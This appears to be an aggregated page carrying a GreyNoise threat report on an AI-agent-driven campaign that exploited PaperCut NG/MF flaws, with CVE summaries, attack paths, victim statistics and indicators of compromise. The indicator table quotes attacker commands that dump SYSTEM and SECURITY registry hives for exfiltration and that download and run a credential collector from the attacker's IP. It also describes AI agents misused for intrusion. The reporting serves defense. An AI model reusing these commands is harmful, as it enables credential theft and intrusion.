ZeroHour
GreyNoisepublished ()ingested 1
Part of a story covered by 9 sources: “AI-powered attack exploited PaperCut flaws to hack 395 organizations” — merged summary and timeline →

Agents Gone Wild: An AI-Orchestrated Global Campaign Against PaperCut NG/MF

AI summary · glm-5.3-flash

AI-orchestrated campaign exploited PaperCut NG/MF RCE (CVE-2026-81578/82078), compromising 440+ instances at 395 organizations in 48 countries.

GreyNoise tracked a likely Russian-speaking actor using AI (OpenAI Codex harness plus a DeepSeek model) to develop, test, and deploy exploits for PaperCut NG/MF (CVE-2026-81578, CVE-2026-82078) starting 31 August 2026. The actor compromised at least 440 PaperCut instances across 395 organizations in 48 countries, achieving domain admin at 12 victims — fastest time to domain admin was five minutes and a US high school was fully compromised in seven minutes. Attack paths involved LSASS memory and registry secret harvesting, pass-the-hash to domain controllers, noPac attacks, account additions to Domain Admins, and DCSync to exfiltrate full NTDS.DIT credential dumps. Impact scope suggests access development potentially for handoff, with prior PaperCut intrusions historically leading to extortion.

  • 440+ PaperCut NG/MF instances compromised across 395 organizations in 48 countries
  • Actor used AI (Codex harness + DeepSeek) to develop and deploy exploits in under four hours
  • Three attack paths to domain admin: LSASS/registry harvesting, noPac, and direct account elevation
  • DCSync used to dump full NTDS.DIT credentials; 12 organizations reached domain admin
  • Cloudflare WAF defeated at least one attack, showing hardening still works

Vulnerabilities mentionedAll →

CVEVulnerabilityCVSSEPSSFlagsAffectedExposurePublished
CVE-2021-42287
+1 in the same advisory: …42278
Privilege Escalation in Microsoft Active Directory Domain Services

CVE-2021-42287 is an elevation-of-privilege vulnerability in Microsoft Active Directory Domain Services (AD DS) affecting multiple supported Windows Server releases. An attacker with any low-privileged domain account can trigger it — commonly in combination with the related sAMAccountName spoofing flaw CVE-2021-42278 — by manipulating account name attributes so the Kerberos Key Distribution Center issues tickets that grant rights normally reserved for domain controllers. The result is escalation from a standard user to domain administrator, giving the attacker full control over the Windows domain, a capability that is directly useful for ransomware deployment and data theft. Any organization running Active Directory on the affected Windows Server versions is exposed, which amounts to essentially every enterprise Windows network. The flaw is actively exploited: it was added to CISA's Known Exploited Vulnerabilities catalog on 2022-04-11 with known ransomware use, and EPSS assigns it a 77.2% probability of exploitation within 30 days.

Do: Apply Microsoft's security updates to every domain controller — writable and read-only — as soon as possible (the fix shipped in Microsoft's November 2021 security releases), prioritizing internet-exposed and VPN-facing DCs. Hunt domain controller logs for anomalous Kerberos TGT requests by user accounts with domain-controller-style names (a hallmark of CVE-2021-42278/42287 abuse) and monitor for ransomware staging activity, given documented ransomware use.

7.577% KEV ransomware
  • microsoft windows server 2004 windows server 2004
  • microsoft windows server 2008 windows server 2008
  • microsoft windows server 2012 windows server 2012
  • +4 more
masswell over 100,000 Windows Server domain controllers and millions of domain users worldwide
CVE-2026-82078
+1 in the same advisory: …81578
Unsafe Reflection RCE in PaperCut NG/MF, Chained with Auth Bypass in Attacks

CVE-2026-82078 is an unsafe dynamic class loading flaw (unsafe reflection, CWE-470) in the database connection utilities of PaperCut NG and PaperCut MF: the software instantiates a database driver class based on a configurable driver name without validating it against an allowlist of approved drivers. An attacker who can manipulate system configuration parameters can point that setting at classes of their choosing, causing the server to execute arbitrary Java bytecode residing on the application classpath in the security context of the PaperCut server process. On its own the issue is rated 9.4 (Critical) with high privileges required, but when chained with the companion authentication bypass CVE-2026-81578 it yields unauthenticated remote code execution on the print-management server. All PaperCut NG and MF deployments are in scope; affected version ranges were not specified in the available data, so administrators should consult PaperCut's advisory for fixed versions. The flaw is confirmed exploited in the wild as a zero-day: it was added to CISA's KEV catalog on 2026-08-31, and public reporting describes an AI-orchestrated campaign that compromised PaperCut servers at roughly 395 organizations (~440 servers), with EPSS currently at 1.7% (76th percentile).

Do: Upgrade PaperCut NG and MF to the patched release specified in PaperCut's security advisory (exact fixed versions were not provided in this data), prioritizing internet-exposed print servers; the KEV listing means agencies must remediate per CISA BOD 26-04 or discontinue/mitigate per its cloud-service guidance. Restrict the PaperCut web interface from direct internet exposure (VPN/allowlist), review administrator accounts and database driver configuration for tampering, and hunt for post-exploitation activity, since this flaw is being actively chained with the authentication bypass CVE-2026-81578.

9.4
group max
2% KEV
  • PaperCut NG
  • PaperCut MF
mass≈100,000+ organizations / plausibly millions of end users (vendor-cited install base); tens of thousands of on-prem servers with a smaller but significant…

Indicators of compromiseAll →

TypeIndicatorContext
ipv445.142.193.132investigation. GreyNoise has been tracking malicious use of 45.142.193.132 since early July 2026 due to its use for attacks against in
ipv445.158.196.7545.142.193.132 Used to orchestrate and execute the campaign 45.158.196.75 Used to execute the campaign 528cd4e69ecfa5191adbcf6ef28667
md5528cd4e69ecfa5191adbcf6ef28667bfute the campaign 45.158.196.75 Used to execute the campaign 528cd4e69ecfa5191adbcf6ef28667bf (lsa_read.exe) Rust LSA secret reader ce870a91e8d27e8f663f0
md5974decb9ff4c8f9ccb0937c96d513347f75d1d19 (lsa_collect_small.exe) Rust LSA bootkey collector 974decb9ff4c8f9ccb0937c96d513347 (certipy.exe) ADCS Abuse Tool Administrator17 Adversary cre
md5a6437ac3d6798090a218520985d36a3f27e8f663f0687abc60b04 (save_hives.exe) Registry Hive Dumper a6437ac3d6798090a218520985d36a3f (collect_custom.exe) Rust custom collector fc92dfafa7aa741c
md5ce870a91e8d27e8f663f0687abc60b04fa5191adbcf6ef28667bf (lsa_read.exe) Rust LSA secret reader ce870a91e8d27e8f663f0687abc60b04 (save_hives.exe) Registry Hive Dumper a6437ac3d6798090a2185
md5fc92dfafa7aa741c5f2b9cbcf75d1d19a218520985d36a3f (collect_custom.exe) Rust custom collector fc92dfafa7aa741c5f2b9cbcf75d1d19 (lsa_collect_small.exe) Rust LSA bootkey collector 974decb9
Full article1,643 words · extracted from greynoise.io · click to collapse

GreyNoise observes adversary activity through our Global Observation Grid (GOG), a network of sensors that draws attacker scanning and exploitation onto infrastructure we control. This lets us study adversary infrastructure, tooling, and tradecraft directly, without waiting for a victim investigation. GreyNoise has been tracking malicious use of 45.142.193.132 since early July 2026 due to its use for attacks against internet facing technologies and devices from Palo Alto, Ubiquiti, Citrix, SonicWall, and Proxmox VE.

On 31 August 2026, a likely Russian-speaking malicious cyber actor (MCA) used 45.142.193.132 and artificial intelligence (AI) to develop, test, and use exploits for PaperCut NG/MF (CVE-2026-81578 and CVE-2026-82078). PaperCut is print management software that enables organizations to track, charge, and manage printing, copying, and scanning jobs for organizations. PaperCut offers cloud and self-hosted versions. PaperCut NG and MF are self-hosted Java web applications that by default run with SYSTEM-level privileges on Windows and are usually domain-joined and integrated with Active Directory. As part of the adversary’s exploit development and testing, they built and attacked a lab environment that included the vulnerable PaperCut software and an Active Directory server. In parallel workflows, the adversary built target lists using an internet scanning service Netlas.io using an identified API key.

Once the adversary achieved remote code execution (RCE) and credential harvesting in its self-hosted lab environment, they used hundreds of AI Agents powered by OpenAI’s Codex (harness), a DeepSeek model (not OpenAI models), and various publicly available offensive security tools to opportunistically compromise at least 440 instances of PaperCut MF/NG hosted by 395 identified victim organizations in 48 countries. There are other real victims that could not be attributed to a named organization. The adversary did explicitly attempt to avoid targeting entities in 28 identified countries; however, our observed victimology shows the attempted restraint failed in some instances.

It’s clear that large language models (LLM) are enabling adversaries to move at greater speed and scale. The adversary went from an empty workspace to first achieving RCE against a real victim in just under four hours, first domain admin in an additional two hours, and once the full campaign launched, compromised at least 11 organizations in 26 seconds. In one instance, the adversary went from initial access to full domain administrator in seven minutes against a high school in the United States. However, the adversary did not experience success evenly across all victims. GreyNoise observed the adversary achieved domain admin against only 12 victim organizations. 

The adversary did not immediately follow-up with all compromised victims, so there were multiple-day delays between initial access and achievement of domain admin but only due to a lack of action by the adversary. Where domain admin was achieved, the adversary’s fastest time was five minutes and the longest time was 144 minutes. At GreyNoise’s time of last observation, the adversary had not achieved domain admin against the other victims. In at least one instance of targeting a perceived vulnerable PaperCut instance, Cloudflare’s Web Application Firewall (WAF) defeated the adversary. Fundamental hardening of environments still matters against AI-enabled threats.

It is unclear if this actor is solely focused on access development to be handed off to other affiliated actors or if they will directly leverage their accesses to achieve follow-on objectives such as data theft or ransomware deployment. In the past, other intrusions involving exploitation of PaperCut have led to extortion. GreyNoise partnered with industry leading incident response services organizations to conduct victim notifications around the clock.

Key Takeaways

  • Despite U.S. based frontier model guardrails, adversaries are using a variety of large language models to conduct intrusions globally
  • AI enables fast and efficient complex orchestration of cyber operations; however, unless properly constrained, agentic operations can deviate from expected behavior and pose operational risk
  • Organizations are not helpless against agentic attacks and traditional hardening does have a positive impact on the security posture of an organization

Intrusion Attack Lifecycle

Where domain admin was achieved, GreyNoise observed three attack paths:

Attack Path A.

If the compromised PaperCut host was a domain member, the adversary harvested LSASS process memory and registry secrets to recover privileged credentials to pass-the-hash to the domain controller.

Attack Path B.

In instances where the victim had not patched for CVE-2021-42278 and CVE-2021-42287, the adversary used a ‘noPac’ attack.

Attack Path C. 

If the compromised PaperCut host was on the Domain Controller itself or running as a Domain-Admin service account, the adversary simply added its newly created account to Domain Admins.

In all Attack Paths, the adversary used DCSync to create a full NTDS.DIT dump to exfiltrate the organization’s credentials.

Indicators of Compromise

Note that these IOCs are not exhaustive, the AI-enabled adversary continued to make necessary changes on the fly. GreyNoise will continue to add new IOCs on our GitHub.

Observable Description
45.142.193.132Used to orchestrate and execute the campaign
45.158.196.75Used to execute the campaign
528cd4e69ecfa5191adbcf6ef28667bf (lsa_read.exe)Rust LSA secret reader
ce870a91e8d27e8f663f0687abc60b04 (save_hives.exe)Registry Hive Dumper
a6437ac3d6798090a218520985d36a3f (collect_custom.exe)Rust custom collector
fc92dfafa7aa741c5f2b9cbcf75d1d19 (lsa_collect_small.exe)Rust LSA bootkey collector
974decb9ff4c8f9ccb0937c96d513347 (certipy.exe)ADCS Abuse Tool
Administrator17Adversary created account
C:\Windows\Temp\pc-sys.hivSYSTEM hive staged for exfil
C:\Windows\Temp\pc-sec.hivSECURITY hive staged for exfil
C:\Windows\Temp\pc-security.hivSECURITY hive staged for exfil
C:\Windows\Temp\pc-system.hivSYSTEM hive staged for exfil
C:\ProgramData\pc-sys-reg.hivSYSTEM hive staged for exfil (alternate path)
C:\Windows\Temp\pc-*.b64Base64-encoded hive chunks staged for HTTP exfiltration
C:\ProgramData\ligolo-agent.exeLigolo tunnel agent dropped for persistent access
...\PaperCut MF\server\custom\web\pcp_<10rand>.txtEvidence of successful exploitation
reg save HKLM\SYSTEM "C:\Windows\Temp\pc-system.hiv" /y & certutil -encode "C:\Windows\Temp\pc-system.hiv" "C:\Windows\Temp\pc-system.b64" & type "C:\Windows\Temp\pc-system.b64"Dumping the SYSTEM registry hive to disk, base64 encoding it, and verifying its output in preparation for exfiltration.
reg save HKLM\SECURITY "C:\Windows\Temp\pc-security.hiv" /y & certutil -encode "C:\Windows\Temp\pc-security.hiv" "C:\Windows\Temp\pc-security.b64" & type "C:\Windows\Temp\pc-security.b64"Dumping the SECURITY registry hive to disk, base64 encoding it, and verifying its output in preparation for exfiltration.
certutil -urlcache -split -f "http://45.142.193[.]132:8000/lsa_collect.exe" C:\Windows\Temp\lsa_collect.exe & C:\Windows\Temp\lsa_collect.exeDownloading and executing LSA bootkey collector
http://45.142.193.132:8089/agent5.exeURL for Ligolo-ng used by adversary
C:\ProgramData\LegitSvc\legit-svc.exeLigolo-ng name and path used by adversary
C:\ProgramData\LegitSvc\legit-svc-backup.exe.Ligolo-ng name and path used by adversary

Adversary Tool Kit

The MCA had a library of publicly available offensive security tools used to expand access to the enterprise environment. Note that not all of these tools were observed in active use during this campaign.

Tool Upstream Acquisition
Mimikatzgentilkiwi/mimikatzbinary
SharpHoundSpecterOps/SharpHoundbinary
Certipyly4k/Certipybinary
BloodHound LegacySpecterOps/BloodHound-Legacybinary
RubeusGhostPack/Rubeusarchive
Impacketfortra/impacketarchive
NetExecPennyw0rth/NetExecarchive
SpoolSampleleechristensen/SpoolSamplearchive
Certipy (source)ly4k/Certipyarchive
BloodHound CESpecterOps/BloodHoundgit clone
Mimikatz (source)ParrotSec/mimikatzgit clone
BloodHound.pydirkjanm/BloodHound.pygit clone
SeatbeltGhostPack/Seatbeltgit clone
CertifyGhostPack/Certifygit clone
SharpSploitcobbr/SharpSploitgit clone
EmpireBC-SECURITY/Empiregit clone
VeeamDumperMWR-CyberSec/VeeamDumpergit clone
SharpVeeamDecryptorS3cur3Th1sSh1t/SharpVeeamDecryptorgit clone
CVE-2023-27532 (PoC 1)horizon3ai/CVE-2023-27532git clone
CVE-2023-27532 (PoC 2)sfewer-r7/CVE-2023-27532git clone
pyVmomivmware/pyvmomigit clone
govmomivmware/govmomigit clone
EDR2trashtristanqtn/EDR2trashgit clone
Disable-TamperProtectionAlteredSecurity/Disable-TamperProtectiongit clone
AMSI Bypass PowerShellS3cur3Th1sSh1t/Amsi-Bypass-Powershellgit clone

Targeting and Victimology

This campaign appears to be opportunistic. There is a high concentration of U.S. based targets in the education sector; however, it’s likely that is more attributable to the customer base of PaperCut NG/MF.

The adversary used a list of defined countries to avoid that existed from previous campaigns. It’s currently uncertain why the MCA’s agents deviated, but it is a good example of Agents Gone Wild. The countries to avoid in order were: Russia, China, Hong Kong, Thailand, Iran, Venezuela, Belarus, Kazakhstan, Kyrgyzstan, Tajikistan, Turkmenistan, Uzbekistan, Armenia, Azerbaijan, Moldova, Ukraine, Brazil, Vietnam, Indonesia, Pakistan, Tanzania, Bangladesh, Afghanistan, Turkey, South Africa, Namibia, Nigeria, and Zimbabwe. 

Volume by Country

Country Victims Credential Harvesting OS / Domain Secrets Domain Admin
United States9859311
United Kingdom5940203
France3123121
Spain31208
Canada241083
Belgium161381
Portugal16951
Australia1584
Germany15821
Switzerland1491
Italy1387
Taiwan121110
Singapore11101
Netherlands965
South Africa9211
Sweden853
Brazil520
Malaysia543
Denmark431
Ireland432
New Zealand431
Argentina310
India332
Cambodia222
Chile211
Finland211
Greece210
Japan200
Puerto Rico220
Austria110
Botswana111
Bulgaria100
China100
Colombia100
Ecuador100
Estonia111
Kazakhstan100
Lithuania111
Mexico111
Namibia110
Nigeria111
Pakistan100
Philippines110
Poland111
Romania111
Saudi Arabia110
Sri Lanka111
Zimbabwe110
Total44028014712

Volume by Industry

Industry Victims Credential Harvesting OS / Domain Secrets Domain Admin
Education204129677
Other / unclassified5132181
Retail / Commercial / Professional services3828162
Real estate / Coworking / Hospitality29206
IT / MSP / Print reseller25178
Non-profit / Religious / Charity211692
Unknown (unattributed)1563
Library / Archive1398
Manufacturing / Industrial / Energy / Utilities1373
Government / Public sector963
Healthcare / Social care832
Legal832
Financial / Insurance642
Total44028014712

GreyNoise will continue monitoring the situation and report updates as needed. 

Text extracted automatically; images, tables and formatting may be missing. Original: https://www.greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf